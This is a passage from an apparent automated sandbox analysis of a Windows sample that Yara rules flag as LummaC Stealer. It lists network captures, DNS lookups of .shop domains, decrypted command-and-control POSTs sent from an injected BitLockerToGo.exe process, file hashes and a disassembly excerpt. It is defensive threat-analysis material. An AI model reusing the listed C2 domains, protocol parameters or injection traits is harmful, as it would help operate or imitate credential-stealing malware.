Sep 1, 2024 22:24:56.945600033 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:57.069245100 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.069289923 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.069376945 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.069752932 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.069767952 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.530913115 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.531011105 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.532601118 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.532612085 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.532814980 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.533833981 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.533854008 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.533895016 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.950717926 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.950810909 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.950861931 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.959395885 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.959418058 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.959446907 CEST	49713	443	192.168.2.5	172.67.161.217
Sep 1, 2024 22:24:57.959453106 CEST	443	49713	172.67.161.217	192.168.2.5
Sep 1, 2024 22:24:57.990849972 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:57.990875006 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:57.990940094 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:57.992388010 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:57.992399931 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.453464985 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.453576088 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.455048084 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.455054998 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.455257893 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.456356049 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.456383944 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.456420898 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569422960 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569469929 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569499969 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569525003 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569525957 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.569540977 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569572926 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.569607973 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569655895 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.569960117 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.569973946 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.569981098 CEST	49714	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.569986105 CEST	443	49714	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.571752071 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.571791887 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:58.571924925 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.572220087 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:58.572235107 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.022763968 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.022855997 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:59.024048090 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:59.024055958 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.024260044 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.025399923 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:59.025433064 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:59.025464058 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.472057104 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.472177982 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.472234964 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:59.472440004 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:59.472461939 CEST	443	49715	104.21.84.50	192.168.2.5
Sep 1, 2024 22:24:59.472470999 CEST	49715	443	192.168.2.5	104.21.84.50
Sep 1, 2024 22:24:59.472485065 CEST	443	49715	104.21.84.50	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 22:24:55.906451941 CEST	58033	53	192.168.2.5	1.1.1.1
Sep 1, 2024 22:24:55.921087980 CEST	53	58033	1.1.1.1	192.168.2.5
Sep 1, 2024 22:24:56.961672068 CEST	52293	53	192.168.2.5	1.1.1.1
Sep 1, 2024 22:24:57.049420118 CEST	53	52293	1.1.1.1	192.168.2.5
Sep 1, 2024 22:24:57.051522970 CEST	56479	53	192.168.2.5	1.1.1.1
Sep 1, 2024 22:24:57.068377018 CEST	53	56479	1.1.1.1	192.168.2.5
Sep 1, 2024 22:24:57.968818903 CEST	49572	53	192.168.2.5	1.1.1.1
Sep 1, 2024 22:24:57.986149073 CEST	53	49572	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 1, 2024 22:24:55.906451941 CEST	192.168.2.5	1.1.1.1	0xeaf4	Standard query (0)	drinnkysoapmzv.shop	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:56.961672068 CEST	192.168.2.5	1.1.1.1	0x6f71	Standard query (0)	potentioallykeos.shop	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:57.051522970 CEST	192.168.2.5	1.1.1.1	0x4f07	Standard query (0)	interactiedovspm.shop	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:57.968818903 CEST	192.168.2.5	1.1.1.1	0x6ec	Standard query (0)	charecteristicdxp.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 1, 2024 22:24:55.921087980 CEST	1.1.1.1	192.168.2.5	0xeaf4	No error (0)	drinnkysoapmzv.shop		172.67.174.127	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:55.921087980 CEST	1.1.1.1	192.168.2.5	0xeaf4	No error (0)	drinnkysoapmzv.shop		104.21.40.15	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:57.049420118 CEST	1.1.1.1	192.168.2.5	0x6f71	Name error (3)	potentioallykeos.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:57.068377018 CEST	1.1.1.1	192.168.2.5	0x4f07	No error (0)	interactiedovspm.shop		172.67.161.217	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:57.068377018 CEST	1.1.1.1	192.168.2.5	0x4f07	No error (0)	interactiedovspm.shop		104.21.42.119	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:57.986149073 CEST	1.1.1.1	192.168.2.5	0x6ec	No error (0)	charecteristicdxp.shop		104.21.84.50	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:24:57.986149073 CEST	1.1.1.1	192.168.2.5	0x6ec	No error (0)	charecteristicdxp.shop		172.67.186.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drinnkysoapmzv.shop

interactiedovspm.shop

charecteristicdxp.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	172.67.174.127	443	3032	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:24:56 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drinnkysoapmzv.shop
2024-09-01 20:24:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-01 20:24:56 UTC	796	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 20:24:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n6hud0bslefbea289d53b9qnhh; expires=Thu, 26 Dec 2024 14:11:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TTREjcYLfdylSpGlzzsExjxxmNLJaNPHNu58E27O8Mr2DAIL15jffw5s5uO7x9mShcwNiSxBiT0SbuNUP7gY7VjIYeTGEZCBTpQHE5hFMoLRiQHUzj1FtgnfqgcDyTcFB%2Fumbne9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc7fc990a887cb2-EWR alt-svc: h3=":443"; ma=86400
2024-09-01 20:24:56 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-01 20:24:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	172.67.161.217	443	3032	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:24:57 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: interactiedovspm.shop
2024-09-01 20:24:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-01 20:24:57 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 20:24:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8ic2jqjl25odnqhtihg0j0ufjf; expires=Thu, 26 Dec 2024 14:11:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TasnCna6Dng3zDeTiYqBUJHPv5Ha6nHydOPgwECPDSG%2BHG2QkMnqJtF2s15rUx00Jvqd57D%2BZYwzLLVP0b0ZE7fOjH3DrkdqrXFMz9IZO2VO%2BolgK4U%2B5ZtCCHHVYUniPlBZHooAefQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc7fca00f517c9f-EWR alt-svc: h3=":443"; ma=86400
2024-09-01 20:24:57 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-01 20:24:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	104.21.84.50	443	3032	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:24:58 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: charecteristicdxp.shop
2024-09-01 20:24:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-01 20:24:58 UTC	559	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 20:24:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ozFHcnc%2B2qtyy9b%2Fv6YV81jUBTWWzhO3GXii3pwkl%2BjthP%2FCQX9qUX2HOtfF9jMzObOe8c%2FtAEazlmlQqrfNacUMD95oiU8dPBwFQA5iB%2FZ8lGQob2aKYVgX4Wqz8j8BGfajiQCLkJdl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc7fca5bc69423b-EWR
2024-09-01 20:24:58 UTC	810	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-01 20:24:58 UTC	1369	IN	Data Raw: 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 Data Ascii: /styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementBy
2024-09-01 20:24:58 UTC	1369	IN	Data Raw: 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 41 69 71 36 4c 59 33 66 52 65 51 52 35 4d 66 61 44 35 73 68 73 30 51 74 36 57 72 37 57 34 56 34 78 5f 73 62 35 69 32 70 47 45 34 2d 31 37 32 35 32 32 32 32 39 38 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 Data Ascii: n"> <input type="hidden" name="atok" value="Aiq6LY3fReQR5MfaD5shs0Qt6Wr7W4V4x_sb5i2pGE4-1725222298-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf
2024-09-01 20:24:58 UTC	857	IN	Data Raw: 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 Data Ascii: arator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloud
2024-09-01 20:24:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	104.21.84.50	443	3032	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:24:59 UTC	359	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=Aiq6LY3fReQR5MfaD5shs0Qt6Wr7W4V4x_sb5i2pGE4-1725222298-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: charecteristicdxp.shop
2024-09-01 20:24:59 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 51 57 51 42 56 6d 2d 2d 4e 75 65 76 61 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=QWQBVm--Nueva1&j=
2024-09-01 20:24:59 UTC	810	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 20:24:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=atgav6ja66sk322sinpnlrl6sa; expires=Thu, 26 Dec 2024 14:11:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OCopqnY4KXSE9hWWHsL961uMUHg6lVvZrpLPPpETTwUqrYP6lI40W4oGavyBkAHW2mL9Opgr%2BiLByGcX5uEp78Rwg%2F58T6QV%2B%2BqIfK3TIh2McQew%2BxSPeDmSHo8S80WqX%2FdtSxgHqGYv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc7fca95e0332f4-EWR alt-svc: h3=":443"; ma=86400
2024-09-01 20:24:59 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-01 20:24:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:23:55
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe"
Imagebase:	0x7ff698a90000
File size:	5'181'952 bytes
MD5 hash:	4B85D1518B4EDC2239DA008E3A91A323
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2619684127.000001FC6D540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2583891127.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2621055667.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2621834022.000000C000400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2621055667.000000C000304000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.2622890654.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.2030347840.00007FF698CEA000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:24:54
Start date:	01/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0x20000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:24:58
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1440
Imagebase:	0xce0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	44.8%
Total number of Nodes:	87
Total number of Limit Nodes:	8

Executed Functions

Function 02FCD120 Relevance: 30.4, Strings: 24, Instructions: 443
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

m, xrefs: 02FCD4E3
N, xrefs: 02FCD44B
O, xrefs: 02FCD45B
O, xrefs: 02FCD443
G, xrefs: 02FCD42B
v, xrefs: 02FCD4EB
<, xrefs: 02FCD41B
M, xrefs: 02FCD463
[, xrefs: 02FCD49B
~, xrefs: 02FCD51B
y, xrefs: 02FCD523
9, xrefs: 02FCD40B
n, xrefs: 02FCD4DB
y, xrefs: 02FCD50B
$, xrefs: 02FCD3AB
e, xrefs: 02FCD4CB
a, xrefs: 02FCD4B3
?, xrefs: 02FCD403
d, xrefs: 02FCD4BB
8, xrefs: 02FCD423
7, xrefs: 02FCD63D
u, xrefs: 02FCD503
1, xrefs: 02FCD3F3
!, xrefs: 02FCD3B3

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: !$$$1$7$8$9$<$?$G$M$N$O$O$[$a$d$e$m$n$u$v$y$y$~
API String ID: 0-3713929542
Opcode ID: c19c43c1767bbc9f7998ee4726c5918f28a1a6bc2df8c0ef9396ce19d100d735
Instruction ID: 4614d09c493f60fc278dd93ef5a84bfe8b70797881fd21d74bed046813b88ae8
Opcode Fuzzy Hash: c19c43c1767bbc9f7998ee4726c5918f28a1a6bc2df8c0ef9396ce19d100d735
Instruction Fuzzy Hash: A1129D61508BC28EC725CF3C888460ABF916B56234F18879DD9F64F7EBD364D406C7A2

Function 02FAA380 Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 570
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(EB2B951F,00000000,00000800), ref: 02FAA43D
GetProcessVersion.KERNEL32(00000000), ref: 02FAA642

Strings

yw, xrefs: 02FAA6D0
XP, xrefs: 02FAA39C
charecteristicdxp.shop, xrefs: 02FAA8B9, 02FAAAE7
ggsp, xrefs: 02FAA7EE
us, xrefs: 02FAA6D8
eF, xrefs: 02FAA7CE
bp[R, xrefs: 02FAA7F6

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: LibraryLoadProcessVersion
String ID: XP$bp[R$charecteristicdxp.shop$eF$ggsp$us$yw
API String ID: 1829952579-1786306832
Opcode ID: c0a62b2721a1e7e8ee69f6159991b1c3aa75ee0f62241893f9c9b96df5f4bf70
